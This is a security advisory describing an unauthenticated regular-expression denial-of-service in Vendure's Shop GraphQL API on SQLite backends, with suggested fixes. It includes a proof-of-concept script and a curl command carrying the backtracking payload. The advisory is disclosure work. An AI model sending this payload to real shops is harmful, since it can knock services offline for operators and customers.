Vulnerability GHSA-jgm3-qmp2-c4p7

High Risk
HIGH RISK
CVSS Score: 7.5
Score Range: 7.0–8.9
High severity vulnerabilities (CVSS 7.0–8.9). Serious vulnerabilities that should be prioritized soon after critical fixes.
10 days ago
September 17, 2026 at 02:49 PM UTC
Vendure: Unauthenticated ReDoS via `regex` filter on SQLite backends
0.1.0-alpha.1 - 3.6.5-master-202607010309
0.1.0-alpha.1 - 3.6.5-master-202607010309

Summary

Vendure: Unauthenticated ReDoS via `regex` filter on SQLite backends

Details

Summary

[!IMPORTANT] Only instances running on the SQLite driver (better-sqlite3) are affected; SQLite is usually used in development/testing backend, so production deployments on PostgreSQL or MySQL/MariaDB are unaffected.

The StringOperators.regex filter exposed on the public Shop GraphQL API is evaluated inside the Node.js event loop via a synchronous SQLite user-defined function (UDF). Supplying a catastrophically backtracking pattern blocks the entire event loop, causing a complete denial of service with no authentication required.

PoC

image [poc.zip](https://github.com/user-attachments/files/28752976/poc.zip) [poc-redos.js](https://github.com/user-attachments/files/28753000/poc-redos.js)

Prerequisites: Node.js ≥ 18. No account, no server, no dependencies.

Step 1 — save the following as poc-redos.js:

// Exact code from list-query-builder.ts:918-919
const PATTERN = '(a+)+$';
const VALUE   = 'a'.repeat(28) + 'b';
console.log('[*] pattern:', PATTERN, '  value:', VALUE);
console.log('[*] Starting (server would be unresponsive from this point)...');
const start = Date.now();
const result = new RegExp(`${PATTERN}`, 'i').test(VALUE);
console.log('[+] elapsed:', Date.now() - start, 'ms  result:', result);

Step 2 — run it:

node poc-redos.js

Expected output (verified on Node.js v24.14.0):

[*] pattern: (a+)+$   value: aaaaaaaaaaaaaaaaaaaaaaaaaaaab
[*] Starting (server would be unresponsive from this point)...
[+] elapsed: 19755 ms  result: false

A 29-character input causes ~20 seconds of CPU spin. Inside a live Vendure server this same code runs synchronously in the SQLite UDF on the Node.js event loop — the process cannot handle any other request for the entire duration.

Step 3 — GraphQL payload (against a running Vendure instance with better-sqlite3 or sqljs driver):

curl -s -X POST http://localhost:3000/shop-api -H "Content-Type: application/json" -d "{\"query\":\"{ products(options:{filter:{name:{regex:\\\"(a+)+$\\\"}}}) { items { id } } }\"}" --max-time 60

No test account is needed. The products query is publicly accessible.

Fix

  1. Validate the regex before constructing it. Reject patterns that are known to cause catastrophic backtracking using a safe-regex library (e.g. safe-regex2 or recheck) before passing them to new RegExp().

  2. Enforce a maximum pattern length. Reject StringOperators.regex values exceeding a reasonable limit (e.g. 100 characters) at the GraphQL validation layer.

  3. Run the UDF in a worker thread. Move regexpFn off the main event loop by executing it in a worker_threads context with an AbortSignal timeout so a hung regex cannot block the server.

  4. Require authentication for filtered list queries. Add @Allow(Permission.Authenticated) to ShopProductsResolver.products (and other filterable list queries) if anonymous product browsing is not a business requirement, as a defence-in-depth measure.

Impacted packages

Timeline

Published
10 days ago
September 17, 2026 at 02:49 PM UTC
Fixed (3.6.5)
Unknown
Unknown
Last Modified
2 days ago
September 25, 2026 at 05:45 PM UTC